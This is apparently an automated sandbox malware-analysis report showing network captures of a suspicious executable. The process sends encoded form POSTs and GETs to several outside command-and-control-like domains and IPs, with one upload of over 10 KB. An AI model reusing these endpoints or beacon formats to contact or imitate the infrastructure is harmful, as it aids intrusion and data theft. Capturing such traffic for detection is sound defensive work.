54 41 [TRUNCATED]
                Data Ascii: AZOTcfex=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4XZY6WMELCLd5ovk5Lh1oVAOCFvxiPkagwO5xzNRgLr8AaDnbqIR+cz7gZfa1+Pjv+mQaJoljOCpTz4MtDN7K1Awg78y6bbrQyVSnC8wxPy+SHD4IvMFqHbiBUTKP22ARYzPvHAYcfecxm1AfcicCXiBKTgojG61O3CTKcNiFW8p8cNiPS8/plfUDViJJWRNeZJ4h+CMVL2GkvWbuQW4hzrHDKPRGzq+NzxMeYmfsd66IZ+JtdBfJWzzrCMc2IglIAYDLuNiLisG96rwUiK1O1Ndr+ZTVeTAkpsy8N3Z8rD7lcRSzFx9wsgGZssteRr2+8wfmeLQSVInd316fCKzj7ZSx/MmL+7KZAmKuxbX20KqC/UrgjH2QGd49+SJkZtMsCBBlTJxxTR+ss3NtZykLjFEsi6uwKYZm0dPAafUC0eaMjNQzm1xGSoexdOfMVPEplukhxL8jQfFwq6HLfN4iKqJLBlJ77jT0CfOGg8TyycBrggKLk5fY4H724rheygicyuNu9NZVhhWHJZPaKnhHjblfqtQHU76541+e2mV4Xb8NjPIz13kR326M1Rd7kxETl8/axlmDwzkaXnAHYn12oplx7T7vCyxn1sml0cpymgZNGoGvppoYnwLLdmDsQrBhmNAmT+Wo3UzCj8RqWqKE2bg8He7//XPGX4vohdc3ki0XAOJKor4YZrrM4byjsyu1AcU48YJhr33J1vyBq+qz/t0DUXYoXhsZT1+Qu2RLXUQXmoNtfzC8qGGlK/3XRAG31vei16Bil4l3fNfR79BC7Zv/Wk3X6aX5dosNc1hTfAzloltqF7T6tM8Xnr/KGTZ0DPzjfKttuaOGOaWy0tKZy/TLLQA2baUY/e7jYIj4ostkFyMi+lxa0+LOmSZ4x+rwS9hmDaCnNUMaRXwCpU/QyxxFkyhYXDdkvxMCIhO4+wLmd6eYe4BYQuRXS26NQcWO2 [TRUNCATED]
                Aug 23, 2024 04:18:48.408241034 CEST580INHTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Fri, 23 Aug 2024 02:18:48 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.449740217.160.0.106802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:18:50.297837019 CEST518OUTGET /qe66/?AZOTcfex=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&bB7L5=DPt0-rQpMXpt HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.catherineviskadi.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:18:51.068322897 CEST770INHTTP/1.1 404 Not Found
                Content-Type: text/html
                Content-Length: 626
                Connection: close
                Date: Fri, 23 Aug 2024 02:18:50 GMT
                Server: Apache
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.449742208.91.197.27802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:19:12.550000906 CEST790OUTPOST /xzzi/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.bfiworkerscomp.com
                Origin: http://www.bfiworkerscomp.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.bfiworkerscomp.com/xzzi/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 35 39 72 66 31 37 61 31 55 4f 5a 4d 67 47 38 38 71 50 57 30 74 56 59 38 77 6e 46 75 57 76 5a 6f 63 31 2b 36 77 2b 43 4c 4c 58 74 7a 67 2f 31 58 4c 56 69 70 4a 2f 34 48 56 58 2f 4d 67 67 48 48 68 4d 4a 75 6b 52 76 6d 51 4a 70 46 4c 67 5a 72 7a 6b 4f 4a 63 62 68 34 34 76 67 78 64 64 51 30 68 38 52 59 6c 33 68 50 66 30 53 41 58 4a 37 56 50 6b 4c 37 64 30 41 75 61 67 62 77 64 44 57 34 4b 34 53 46 6e 37 54 52 75 6b 74 6b 79 76 53 49 37 38 45 54 44 4c 72 77 45 67 4b 5a 55 48 57 71 63 4e 61 63 4d 38 76 73 75 5a 2b 48 6b 42 51 71 69 61 4d 62 6a 67 3d 3d
                Data Ascii: AZOTcfex=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDLrwEgKZUHWqcNacM8vsuZ+HkBQqiaMbjg==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.449743208.91.197.27802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:19:15.078872919 CEST810OUTPOST /xzzi/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.bfiworkerscomp.com
                Origin: http://www.bfiworkerscomp.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.bfiworkerscomp.com/xzzi/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 78 6f 63 55 4f 36 78 2f 43 4c 49 58 74 7a 31 50 31 53 50 56 69 33 4a 2f 38 50 56 53 48 4d 67 67 44 48 68 4a 31 75 6b 41 76 35 52 5a 70 44 44 41 5a 74 33 6b 4f 4a 63 62 68 34 34 76 46 55 64 5a 30 30 68 50 5a 59 33 69 56 4d 57 55 53 44 57 4a 37 56 59 55 4c 2f 64 30 41 51 61 68 33 4b 64 42 75 34 4b 35 69 46 67 75 7a 53 68 6b 74 6d 76 2f 54 47 71 74 74 39 47 2b 4f 42 50 42 71 36 61 46 65 71 51 72 4c 47 64 4e 4f 37 38 5a 61 30 35 47 5a 65 76 5a 78 53 34 76 78 43 4e 4e 47 72 33 70 4b 4e 43 74 54 4b 49 56 45 42 77 76 73 3d
                Data Ascii: AZOTcfex=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78Za05GZevZxS4vxCNNGr3pKNCtTKIVEBwvs=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.449744208.91.197.27802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:19:17.611164093 CEST10892OUTPOST /xzzi/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.bfiworkerscomp.com
                Origin: http://www.bfiworkerscomp.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.bfiworkerscomp.com/xzzi/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 4a 6f 63 6d 71 36 78 63 36 4c 4a 58 74 7a 70 66 31 54 50 56 6a 79 4a 37 51 4c 56 54 36 78 67 69 4c 48 67 72 4e 75 7a 45 7a 35 66 70 70 44 63 51 5a 73 7a 6b 4f 51 63 62 78 30 34 76 31 55 64 5a 30 30 68 4a 39 59 6e 48 68 4d 61 30 53 41 58 4a 37 5a 50 6b 4c 48 64 30 4a 72 61 68 43 39 64 31 61 34 4c 5a 79 46 69 64 62 53 6f 6b 74 67 73 2f 53 62 71 74 78 2b 47 36 76 2b 50 42 65 41 61 48 43 71 54 64 6a 61 48 39 36 50 76 49 71 59 37 32 78 4f 72 4a 34 54 37 38 78 58 4e 63 36 63 69 74 50 75 41 2f 71 68 66 67 55 77 70 36 2f 35 62 34 5a 41 73 69 49 33 61 68 79 32 58 59 43 6c 73 75 59 6f 4c 52 57 38 47 58 6c 66 46 4a 51 69 52 57 39 4a 42 69 71 48 4b 61 6f 4b 36 49 77 39 7a 4b 71 64 6a 72 44 57 31 5a 46 4b 44 54 57 43 7a 4d 71 62 39 6e 64 65 54 6b 62 65 41 51 75 41 45 6c 51 49 6e 44 6a 34 73 45 77 49 37 71 45 71 51 45 6f 2f 34 30 48 74 4c 52 34 63 50 45 43 49 74 [TRUNCATED]
                Data Ascii: AZOTcfex=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5Jocmq6xc6LJXtzpf1TPVjyJ7QLVT6xgiLHgrNuzEz5fppDcQZszkOQcbx04v1UdZ00hJ9YnHhMa0SAXJ7ZPkLHd0JrahC9d1a4LZyFidbSoktgs/Sbqtx+G6v+PBeAaHCqTdjaH96PvIqY72xOrJ4T78xXNc6citPuA/qhfgUwp6/5b4ZAsiI3ahy2XYClsuYoLRW8GXlfFJQiRW9JBiqHKaoK6Iw9zKqdjrDW1ZFKDTWCzMqb9ndeTkbeAQuAElQInDj4sEwI7qEqQEo/40HtLR4cPECItmFJz8q2d6pU4Ll7VU2sZsAI1N9jsSxu+eTj6YbKXJv8fXXQqvG3BbGJskhF9Ve/wnRYhL+vXXqZZNGcGKVV7oYforgpXJpV3bcZ7DCMeRW7Q4foENPhAjoU1k/cFL2mm9gvpNiCf9X3hjL7s24pdlVzpUBejJjFPnHCKCLtRG8Qg2CQkZVaQe1zHyLzOMYQoYnUmTRlCeEKfq3CRh32Ny3Ni9lv8d+qKbPpzr/5XQKeEO3VWB6H0w96rKUdeKp7EoPDK2c/T03xZ9XKxqd47zb5IXLF0gw1CqvJoxn4C0BzUPdwFbrGTNJ7LEZyjUs1OgzEVCU+NYuhfr1wLdGLMIliXxTxIQ4XNR2rQzj+I1Su0kk1PiIl1P7lYqE1W8q7cpo3do02/UjfJugRn+Z3T4OqN905CBUBc40YcJjXZVlxb6yt0SulegB5Vyqw0Tkv5hbbxvtVC46sNp4Lg+/5tJTQW6EyDP5ReN2c/SOL9Qw/R9yo8Bk2QsMcpuIeWbe6f9fRkuy+olxap3NUgeloDC00V39WiomQYDqW1N+FpmL3yF9wb9tS0EzK7kFus2Mv/5VI365zo1jlEyxmNbHS04P9WqPbVzcBxdz1bCjN+OrYYRhDeL4DEjI19X+KLct1xHqmHD1cEqqeaEC7VViPP16JAXO8lYaiE6A [TRUNCATED]


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.449745208.91.197.27802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:19:20.144239902 CEST516OUTGET /xzzi/?bB7L5=DPt0-rQpMXpt&AZOTcfex=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.bfiworkerscomp.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:19:22.188949108 CEST1236INHTTP/1.1 200 OK
                Date: Fri, 23 Aug 2024 02:18:59 GMT
                Server: Apache
                Referrer-Policy: no-referrer-when-downgrade
                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                Set-Cookie: vsid=932vr471925139712582222; expires=Wed, 22-Aug-2029 02:18:59 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly
                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_T89Q0gHGpMP7mo/WWLv0ADyoZNeD0EOxMU5E2VVsmfffFN+HGhsqQpLGOVsK9Rz7y6CtQD/0t0jS9hElvCU4qA==
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Connection: close
                Data Raw: 61 31 66 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65
                Data Ascii: a1ff<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.ne
                Aug 23, 2024 04:19:22.188982010 CEST1236INData Raw: 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69
                Data Ascii: t"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" i
                Aug 23, 2024 04:19:22.188999891 CEST1236INData Raw: 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e
                Data Ascii: tion(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languag
                Aug 23, 2024 04:19:22.189014912 CEST1236INData Raw: 67 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75
                Data Ascii: guages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash
                Aug 23, 2024 04:19:22.189033031 CEST859INData Raw: 2b 68 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22
                Data Ascii: +h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}els
                Aug 23, 2024 04:19:22.189047098 CEST1236INData Raw: 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64
                Data Ascii: ntScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){
                Aug 23, 2024 04:19:22.189060926 CEST224INData Raw: 61 72 67 75 6d 65 6e 74 73 3b 5f 5f 63 6d 70 2e 61 3d 5f 5f 63 6d 70 2e 61 7c 7c 5b 5d 3b 69 66 28 21 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 20 5f 5f 63 6d 70 2e 61 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 70 69 6e 67 22 29 7b
                Data Ascii: arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}el
                Aug 23, 2024 04:19:22.189074993 CEST1236INData Raw: 73 65 7b 61 5b 32 5d 28 66 61 6c 73 65 2c 74 72 75 65 29 7d 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e 3a 31 2c 75 73 70 53 74 72 69 6e 67 3a 77 69 6e 64 6f 77
                Data Ascii: se{a[2](false,true)}}else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].s
                Aug 23, 2024 04:19:22.189088106 CEST1236INData Raw: 28 67 3d 3d 3d 22 67 65 74 47 50 50 44 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f
                Data Ascii: (g==="getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}
                Aug 23, 2024 04:19:22.189105988 CEST1236INData Raw: 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d
                Data Ascii: lue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window
                Aug 23, 2024 04:19:22.195242882 CEST1236INData Raw: 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c
                Data Ascii: w.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.44974643.252.167.188802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:19:36.087420940 CEST796OUTPOST /rm91/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--fhq1c541j0zr.com
                Origin: http://www.xn--fhq1c541j0zr.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 46 51 39 4f 55 2b 34 35 30 6c 42 42 64 6a 79 59 48 6a 6f 39 48 38 38 2f 6f 48 34 55 49 52 59 57 32 68 2b 37 42 37 64 54 2f 68 52 48 33 42 62 73 58 65 78 30 70 63 4b 46 2f 54 32 52 47 5a 78 6d 68 42 79 6b 50 78 54 6a 4c 73 49 63 76 33 48 77 73 68 51 6f 2b 2f 65 61 75 73 4d 70 4b 79 43 5a 34 50 44 2f 53 72 4f 6a 70 4d 57 52 4b 46 67 53 53 41 43 5a 2b 6b 61 64 6d 6f 69 67 41 59 50 42 38 46 76 68 64 70 57 68 6a 38 36 4c 70 45 53 68 32 7a 35 73 50 42 45 45 45 38 4f 65 58 67 67 4b 66 79 41 63 45 31 64 46 65 67 71 6e 77 43 46 69 53 34 59 6c 4a 77 3d 3d
